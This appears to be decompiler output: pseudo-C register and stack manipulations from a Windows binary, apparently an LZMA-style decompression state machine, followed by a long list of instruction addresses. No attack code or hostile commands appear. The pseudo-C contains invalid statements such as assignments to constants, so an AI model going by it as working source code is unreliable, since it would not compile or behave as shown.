                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													 *(__ebp - 0x40) = 1;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													__ebx = __ebx + __ebx + 1;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edx;
                                                          													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L39;
                                                          												} else {
                                                          													goto L37;
                                                          												}
                                                          											case 0xe:
                                                          												L46:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xe;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t156 = __ebp - 0x70;
                                                          												 *_t156 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t156;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												while(1) {
                                                          													L48:
                                                          													__eflags = __ebx - 0x100;
                                                          													if(__ebx >= 0x100) {
                                                          														break;
                                                          													}
                                                          													__eax =  *(__ebp - 0x58);
                                                          													__edx = __ebx + __ebx;
                                                          													__ecx =  *(__ebp - 0x10);
                                                          													__esi = __edx + __eax;
                                                          													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          													__ax =  *__esi;
                                                          													 *(__ebp - 0x54) = __esi;
                                                          													__edi = __ax & 0x0000ffff;
                                                          													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          													__eflags =  *(__ebp - 0xc) - __ecx;
                                                          													if( *(__ebp - 0xc) >= __ecx) {
                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          														__cx = __ax;
                                                          														_t170 = __edx + 1; // 0x1
                                                          														__ebx = _t170;
                                                          														__cx = __ax >> 5;
                                                          														__eflags = __eax;
                                                          														 *__esi = __ax;
                                                          													} else {
                                                          														 *(__ebp - 0x10) = __ecx;
                                                          														0x800 = 0x800 - __edi;
                                                          														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          														__ebx = __ebx + __ebx;
                                                          														 *__esi = __cx;
                                                          													}
                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                          														continue;
                                                          													} else {
                                                          														goto L46;
                                                          													}
                                                          												}
                                                          												L54:
                                                          												_t173 = __ebp - 0x34;
                                                          												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                          												__eflags =  *_t173;
                                                          												goto L55;
                                                          											case 0xf:
                                                          												L58:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0xf;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t203 = __ebp - 0x70;
                                                          												 *_t203 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t203;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L60:
                                                          												__eflags = __ebx - 0x100;
                                                          												if(__ebx >= 0x100) {
                                                          													L55:
                                                          													__al =  *(__ebp - 0x44);
                                                          													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                          													goto L56;
                                                          												}
                                                          												L61:
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__edx = __ebx + __ebx;
                                                          												__ecx =  *(__ebp - 0x10);
                                                          												__esi = __edx + __eax;
                                                          												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                          												__ax =  *__esi;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													_t217 = __edx + 1; // 0x1
                                                          													__ebx = _t217;
                                                          													__cx = __ax >> 5;
                                                          													__eflags = __eax;
                                                          													 *__esi = __ax;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													__ebx = __ebx + __ebx;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L60;
                                                          												} else {
                                                          													goto L58;
                                                          												}
                                                          											case 0x10:
                                                          												L109:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0x10;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t365 = __ebp - 0x70;
                                                          												 *_t365 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t365;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												goto L111;
                                                          											case 0x11:
                                                          												goto L69;
                                                          											case 0x12:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													__eax =  *(__ebp - 0x58);
                                                          													 *(__ebp - 0x84) = 0x13;
                                                          													__esi =  *(__ebp - 0x58) + 2;
                                                          													while(1) {
                                                          														L132:
                                                          														 *(_t613 - 0x54) = _t606;
                                                          														goto L133;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x4c);
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                          												__eflags = __eax;
                                                          												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                          												goto L130;
                                                          											case 0x13:
                                                          												__eflags =  *(__ebp - 0x40);
                                                          												if( *(__ebp - 0x40) != 0) {
                                                          													_t469 = __ebp - 0x58;
                                                          													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                          													__eflags =  *_t469;
                                                          													 *(__ebp - 0x30) = 0x10;
                                                          													 *(__ebp - 0x40) = 8;
                                                          													L144:
                                                          													 *(__ebp - 0x7c) = 0x14;
                                                          													goto L145;
                                                          												}
                                                          												__eax =  *(__ebp - 0x4c);
                                                          												__ecx =  *(__ebp - 0x58);
                                                          												__eax =  *(__ebp - 0x4c) << 4;
                                                          												 *(__ebp - 0x30) = 8;
                                                          												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                          												L130:
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												 *(__ebp - 0x40) = 3;
                                                          												goto L144;
                                                          											case 0x14:
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                          												__eax =  *(__ebp - 0x80);
                                                          												 *(_t613 - 0x88) = _t533;
                                                          												goto L1;
                                                          											case 0x15:
                                                          												__eax = 0;
                                                          												__eflags =  *(__ebp - 0x38) - 7;
                                                          												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                          												__al = __al & 0x000000fd;
                                                          												__eax = (__eflags >= 0) - 1 + 0xb;
                                                          												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                          												goto L120;
                                                          											case 0x16:
                                                          												__eax =  *(__ebp - 0x30);
                                                          												__eflags = __eax - 4;
                                                          												if(__eax >= 4) {
                                                          													_push(3);
                                                          													_pop(__eax);
                                                          												}
                                                          												__ecx =  *(__ebp - 4);
                                                          												 *(__ebp - 0x40) = 6;
                                                          												__eax = __eax << 7;
                                                          												 *(__ebp - 0x7c) = 0x19;
                                                          												 *(__ebp - 0x58) = __eax;
                                                          												goto L145;
                                                          											case 0x17:
                                                          												L145:
                                                          												__eax =  *(__ebp - 0x40);
                                                          												 *(__ebp - 0x50) = 1;
                                                          												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                          												goto L149;
                                                          											case 0x18:
                                                          												L146:
                                                          												__eflags =  *(__ebp - 0x6c);
                                                          												if( *(__ebp - 0x6c) == 0) {
                                                          													 *(__ebp - 0x88) = 0x18;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x70);
                                                          												__eax =  *(__ebp - 0xc);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                          												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                          												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												_t484 = __ebp - 0x70;
                                                          												 *_t484 =  *(__ebp - 0x70) + 1;
                                                          												__eflags =  *_t484;
                                                          												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                          												L148:
                                                          												_t487 = __ebp - 0x48;
                                                          												 *_t487 =  *(__ebp - 0x48) - 1;
                                                          												__eflags =  *_t487;
                                                          												L149:
                                                          												__eflags =  *(__ebp - 0x48);
                                                          												if( *(__ebp - 0x48) <= 0) {
                                                          													__ecx =  *(__ebp - 0x40);
                                                          													__ebx =  *(__ebp - 0x50);
                                                          													0 = 1;
                                                          													__eax = 1 << __cl;
                                                          													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                          													__eax =  *(__ebp - 0x7c);
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													while(1) {
                                                          														 *(_t613 - 0x88) = _t533;
                                                          														goto L1;
                                                          													}
                                                          												}
                                                          												__eax =  *(__ebp - 0x50);
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          												__eax =  *(__ebp - 0x58);
                                                          												__esi = __edx + __eax;
                                                          												 *(__ebp - 0x54) = __esi;
                                                          												__ax =  *__esi;
                                                          												__edi = __ax & 0x0000ffff;
                                                          												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                          												__eflags =  *(__ebp - 0xc) - __ecx;
                                                          												if( *(__ebp - 0xc) >= __ecx) {
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                          													__cx = __ax;
                                                          													__cx = __ax >> 5;
                                                          													__eax = __eax - __ecx;
                                                          													__edx = __edx + 1;
                                                          													__eflags = __edx;
                                                          													 *__esi = __ax;
                                                          													 *(__ebp - 0x50) = __edx;
                                                          												} else {
                                                          													 *(__ebp - 0x10) = __ecx;
                                                          													0x800 = 0x800 - __edi;
                                                          													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                          													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          													 *__esi = __cx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													goto L148;
                                                          												} else {
                                                          													goto L146;
                                                          												}
                                                          											case 0x19:
                                                          												__eflags = __ebx - 4;
                                                          												if(__ebx < 4) {
                                                          													 *(__ebp - 0x2c) = __ebx;
                                                          													L119:
                                                          													_t393 = __ebp - 0x2c;
                                                          													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                          													__eflags =  *_t393;
                                                          													L120:
                                                          													__eax =  *(__ebp - 0x2c);
                                                          													__eflags = __eax;
                                                          													if(__eax == 0) {
                                                          														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                          														goto L170;
                                                          													}
                                                          													__eflags = __eax -  *(__ebp - 0x60);
                                                          													if(__eax >  *(__ebp - 0x60)) {
                                                          														goto L171;
                                                          													}
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                          													__eax =  *(__ebp - 0x30);
                                                          													_t400 = __ebp - 0x60;
                                                          													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                          													__eflags =  *_t400;
                                                          													goto L123;
                                                          												}
                                                          												__ecx = __ebx;
                                                          												__eax = __ebx;
                                                          												__ecx = __ebx >> 1;
                                                          												__eax = __ebx & 0x00000001;
                                                          												__ecx = (__ebx >> 1) - 1;
                                                          												__al = __al | 0x00000002;
                                                          												__eax = (__ebx & 0x00000001) << __cl;
                                                          												__eflags = __ebx - 0xe;
                                                          												 *(__ebp - 0x2c) = __eax;
                                                          												if(__ebx >= 0xe) {
                                                          													__ebx = 0;
                                                          													 *(__ebp - 0x48) = __ecx;
                                                          													L102:
                                                          													__eflags =  *(__ebp - 0x48);
                                                          													if( *(__ebp - 0x48) <= 0) {
                                                          														__eax = __eax + __ebx;
                                                          														 *(__ebp - 0x40) = 4;
                                                          														 *(__ebp - 0x2c) = __eax;
                                                          														__eax =  *(__ebp - 4);
                                                          														__eax =  *(__ebp - 4) + 0x644;
                                                          														__eflags = __eax;
                                                          														L108:
                                                          														__ebx = 0;
                                                          														 *(__ebp - 0x58) = __eax;
                                                          														 *(__ebp - 0x50) = 1;
                                                          														 *(__ebp - 0x44) = 0;
                                                          														 *(__ebp - 0x48) = 0;
                                                          														L112:
                                                          														__eax =  *(__ebp - 0x40);
                                                          														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                          														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                          															_t391 = __ebp - 0x2c;
                                                          															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                          															__eflags =  *_t391;
                                                          															goto L119;
                                                          														}
                                                          														__eax =  *(__ebp - 0x50);
                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                          														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                          														__eax =  *(__ebp - 0x58);
                                                          														__esi = __edi + __eax;
                                                          														 *(__ebp - 0x54) = __esi;
                                                          														__ax =  *__esi;
                                                          														__ecx = __ax & 0x0000ffff;
                                                          														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                          														__eflags =  *(__ebp - 0xc) - __edx;
                                                          														if( *(__ebp - 0xc) >= __edx) {
                                                          															__ecx = 0;
                                                          															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                          															__ecx = 1;
                                                          															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                          															__ebx = 1;
                                                          															__ecx =  *(__ebp - 0x48);
                                                          															__ebx = 1 << __cl;
                                                          															__ecx = 1 << __cl;
                                                          															__ebx =  *(__ebp - 0x44);
                                                          															__ebx =  *(__ebp - 0x44) | __ecx;
                                                          															__cx = __ax;
                                                          															__cx = __ax >> 5;
                                                          															__eax = __eax - __ecx;
                                                          															__edi = __edi + 1;
                                                          															__eflags = __edi;
                                                          															 *(__ebp - 0x44) = __ebx;
                                                          															 *__esi = __ax;
                                                          															 *(__ebp - 0x50) = __edi;
                                                          														} else {
                                                          															 *(__ebp - 0x10) = __edx;
                                                          															0x800 = 0x800 - __ecx;
                                                          															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          															 *__esi = __dx;
                                                          														}
                                                          														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          														if( *(__ebp - 0x10) >= 0x1000000) {
                                                          															L111:
                                                          															_t368 = __ebp - 0x48;
                                                          															 *_t368 =  *(__ebp - 0x48) + 1;
                                                          															__eflags =  *_t368;
                                                          															goto L112;
                                                          														} else {
                                                          															goto L109;
                                                          														}
                                                          													}
                                                          													__ecx =  *(__ebp - 0xc);
                                                          													__ebx = __ebx + __ebx;
                                                          													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                          													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                          														__ecx =  *(__ebp - 0x10);
                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          														__ebx = __ebx | 0x00000001;
                                                          														__eflags = __ebx;
                                                          														 *(__ebp - 0x44) = __ebx;
                                                          													}
                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                          														L101:
                                                          														_t338 = __ebp - 0x48;
                                                          														 *_t338 =  *(__ebp - 0x48) - 1;
                                                          														__eflags =  *_t338;
                                                          														goto L102;
                                                          													} else {
                                                          														goto L99;
                                                          													}
                                                          												}
                                                          												__edx =  *(__ebp - 4);
                                                          												__eax = __eax - __ebx;
                                                          												 *(__ebp - 0x40) = __ecx;
                                                          												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                          												goto L108;
                                                          											case 0x1a:
                                                          												L56:
                                                          												__eflags =  *(__ebp - 0x64);
                                                          												if( *(__ebp - 0x64) == 0) {
                                                          													 *(__ebp - 0x88) = 0x1a;
                                                          													goto L170;
                                                          												}
                                                          												__ecx =  *(__ebp - 0x68);
                                                          												__al =  *(__ebp - 0x5c);
                                                          												__edx =  *(__ebp - 8);
                                                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          												 *( *(__ebp - 0x68)) = __al;
                                                          												__ecx =  *(__ebp - 0x14);
                                                          												 *(__ecx +  *(__ebp - 8)) = __al;
                                                          												__eax = __ecx + 1;
                                                          												__edx = 0;
                                                          												_t192 = __eax %  *(__ebp - 0x74);
                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                          												__edx = _t192;
                                                          												goto L80;
                                                          											case 0x1b:
                                                          												L76:
                                                          												__eflags =  *(__ebp - 0x64);
                                                          												if( *(__ebp - 0x64) == 0) {
                                                          													 *(__ebp - 0x88) = 0x1b;
                                                          													goto L170;
                                                          												}
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__edx =  *(__ebp - 8);
                                                          												__cl =  *(__eax + __edx);
                                                          												__eax =  *(__ebp - 0x14);
                                                          												 *(__ebp - 0x5c) = __cl;
                                                          												 *(__eax + __edx) = __cl;
                                                          												__eax = __eax + 1;
                                                          												__edx = 0;
                                                          												_t275 = __eax %  *(__ebp - 0x74);
                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                          												__edx = _t275;
                                                          												__eax =  *(__ebp - 0x68);
                                                          												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          												_t284 = __ebp - 0x64;
                                                          												 *_t284 =  *(__ebp - 0x64) - 1;
                                                          												__eflags =  *_t284;
                                                          												 *( *(__ebp - 0x68)) = __cl;
                                                          												L80:
                                                          												 *(__ebp - 0x14) = __edx;
                                                          												goto L81;
                                                          											case 0x1c:
                                                          												while(1) {
                                                          													L123:
                                                          													__eflags =  *(__ebp - 0x64);
                                                          													if( *(__ebp - 0x64) == 0) {
                                                          														break;
                                                          													}
                                                          													__eax =  *(__ebp - 0x14);
                                                          													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          													__eflags = __eax -  *(__ebp - 0x74);
                                                          													if(__eax >=  *(__ebp - 0x74)) {
                                                          														__eax = __eax +  *(__ebp - 0x74);
                                                          														__eflags = __eax;
                                                          													}
                                                          													__edx =  *(__ebp - 8);
                                                          													__cl =  *(__eax + __edx);
                                                          													__eax =  *(__ebp - 0x14);
                                                          													 *(__ebp - 0x5c) = __cl;
                                                          													 *(__eax + __edx) = __cl;
                                                          													__eax = __eax + 1;
                                                          													__edx = 0;
                                                          													_t414 = __eax %  *(__ebp - 0x74);
                                                          													__eax = __eax /  *(__ebp - 0x74);
                                                          													__edx = _t414;
                                                          													__eax =  *(__ebp - 0x68);
                                                          													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                          													__eflags =  *(__ebp - 0x30);
                                                          													 *( *(__ebp - 0x68)) = __cl;
                                                          													 *(__ebp - 0x14) = _t414;
                                                          													if( *(__ebp - 0x30) > 0) {
                                                          														continue;
                                                          													} else {
                                                          														L81:
                                                          														 *(__ebp - 0x88) = 2;
                                                          														goto L1;
                                                          													}
                                                          												}
                                                          												 *(__ebp - 0x88) = 0x1c;
                                                          												goto L170;
                                                          										}
                                                          									}
                                                          									L171:
                                                          									_t535 = _t534 | 0xffffffff;
                                                          									goto L172;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					goto L1;
                                                          				}
                                                          			}













                                                          0x00000000
                                                          0x0040711c
                                                          0x0040711c
                                                          0x00407120
                                                          0x0040712d
                                                          0x00407137
                                                          0x00000000
                                                          0x00407122
                                                          0x00407122
                                                          0x0040715d
                                                          0x00407160
                                                          0x00407163
                                                          0x00407166
                                                          0x00407166
                                                          0x00407169
                                                          0x00407170
                                                          0x00407175
                                                          0x00407056
                                                          0x00407059
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x0040741a
                                                          0x00000000
                                                          0x00000000
                                                          0x0040741c
                                                          0x00407420
                                                          0x004075cf
                                                          0x004075e5
                                                          0x004075ed
                                                          0x004075f4
                                                          0x004075f6
                                                          0x004075fd
                                                          0x00407601
                                                          0x00407601
                                                          0x0040742c
                                                          0x00407433
                                                          0x0040743b
                                                          0x0040743e
                                                          0x00407441
                                                          0x00407441
                                                          0x00407447
                                                          0x00407447
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406be3
                                                          0x00406bec
                                                          0x00000000
                                                          0x00000000
                                                          0x00406bf2
                                                          0x00000000
                                                          0x00406bfd
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c06
                                                          0x00406c09
                                                          0x00406c0c
                                                          0x00406c10
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c16
                                                          0x00406c19
                                                          0x00406c1b
                                                          0x00406c1c
                                                          0x00406c1f
                                                          0x00406c21
                                                          0x00406c22
                                                          0x00406c24
                                                          0x00406c27
                                                          0x00406c2c
                                                          0x00406c31
                                                          0x00406c3a
                                                          0x00406c4d
                                                          0x00406c50
                                                          0x00406c5c
                                                          0x00406c84
                                                          0x00406c86
                                                          0x00406c94
                                                          0x00406c94
                                                          0x00406c98
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c88
                                                          0x00406c8b
                                                          0x00406c8c
                                                          0x00406c8c
                                                          0x00000000
                                                          0x00406c88
                                                          0x00406c62
                                                          0x00406c67
                                                          0x00406c67
                                                          0x00406c70
                                                          0x00406c78
                                                          0x00406c7b
                                                          0x00000000
                                                          0x00406c81
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c81
                                                          0x00000000
                                                          0x00406c9e
                                                          0x00406c9e
                                                          0x00406ca2
                                                          0x0040754e
                                                          0x00000000
                                                          0x0040754e
                                                          0x00406cab
                                                          0x00406cbb
                                                          0x00406cbe
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc1
                                                          0x00406cc4
                                                          0x00406cc8
                                                          0x00000000
                                                          0x00000000
                                                          0x00406cca
                                                          0x00406cd0
                                                          0x00406cfa
                                                          0x00406d00
                                                          0x00406d07
                                                          0x00000000
                                                          0x00406d07
                                                          0x00406cd6
                                                          0x00406cd9
                                                          0x00406cde
                                                          0x00406cde
                                                          0x00406ce9
                                                          0x00406cf1
                                                          0x00406cf4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d39
                                                          0x00406d3f
                                                          0x00406d42
                                                          0x00406d4f
                                                          0x00406d57
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d0e
                                                          0x00406d0e
                                                          0x00406d12
                                                          0x0040755d
                                                          0x00000000
                                                          0x0040755d
                                                          0x00406d1e
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d29
                                                          0x00406d2c
                                                          0x00406d2f
                                                          0x00406d32
                                                          0x00406d37
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004073ce
                                                          0x004073ce
                                                          0x004073d4
                                                          0x004073da
                                                          0x004073e0
                                                          0x004073fa
                                                          0x004073fd
                                                          0x00407403
                                                          0x0040740e
                                                          0x00407410
                                                          0x004073e2
                                                          0x004073e2
                                                          0x004073f1
                                                          0x004073f5
                                                          0x004073f5
                                                          0x0040741a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406d5f
                                                          0x00406d61
                                                          0x00406d64
                                                          0x00406dd5
                                                          0x00406dd8
                                                          0x00406ddb
                                                          0x00406de2
                                                          0x00406dec
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00406d66
                                                          0x00406d6a
                                                          0x00406d6d
                                                          0x00406d6f
                                                          0x00406d72
                                                          0x00406d75
                                                          0x00406d77
                                                          0x00406d7a
                                                          0x00406d7c
                                                          0x00406d81
                                                          0x00406d84
                                                          0x00406d87
                                                          0x00406d8b
                                                          0x00406d92
                                                          0x00406d95
                                                          0x00406d9c
                                                          0x00406da0
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da8
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406da2
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406d97
                                                          0x00406dac
                                                          0x00406daf
                                                          0x00406dcd
                                                          0x00406dcf
                                                          0x00000000
                                                          0x00406db1
                                                          0x00406db1
                                                          0x00406db4
                                                          0x00406db7
                                                          0x00406dba
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbc
                                                          0x00406dbf
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc5
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00406dc8
                                                          0x00000000
                                                          0x00406ffe
                                                          0x00407002
                                                          0x00407020
                                                          0x00407023
                                                          0x0040702a
                                                          0x0040702d
                                                          0x00407030
                                                          0x00407033
                                                          0x00407036
                                                          0x00407039
                                                          0x0040703b
                                                          0x00407042
                                                          0x00407043
                                                          0x00407045
                                                          0x00407048
                                                          0x0040704b
                                                          0x0040704e
                                                          0x0040704e
                                                          0x00407053
                                                          0x00000000
                                                          0x00407053
                                                          0x00407004
                                                          0x00407007
                                                          0x0040700a
                                                          0x00407014
                                                          0x004073cb
                                                          0x004073cb
                                                          0x004073cb
                                                          0x00000000
                                                          0x004073cb
                                                          0x00000000
                                                          0x00407068
                                                          0x0040706c
